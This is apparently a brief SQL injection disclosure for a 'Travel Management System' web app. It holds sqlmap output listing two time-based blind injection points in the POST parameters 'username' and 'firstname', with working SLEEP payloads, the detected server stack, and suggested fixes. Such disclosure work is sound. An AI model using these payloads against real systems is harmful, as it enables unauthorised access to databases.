sqlmap identified the following injection point(s) with a total of 260 HTTP(s) requests:
---
Parameter: username (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: username=ss' AND (SELECT 7981 FROM (SELECT(SLEEP(5)))JEzE) AND 'QYRN'='QYRN&password=dd&login=Login

Parameter: firstname (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: firstname=kk' AND (SELECT 8085 FROM (SELECT(SLEEP(5)))rRzr) AND 'XFtD'='XFtD&message=kk&submit=Submit
---
web application technology: PHP 8.0.28, Apache 2.4.56
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
---
Test Environment: Travel Management System
Test Date: 2025-03-10
Mitigations Suggested:
- Use parameterized queries and prepared statements
- Implement input validation and sanitization
- Use ORM frameworks for database interactions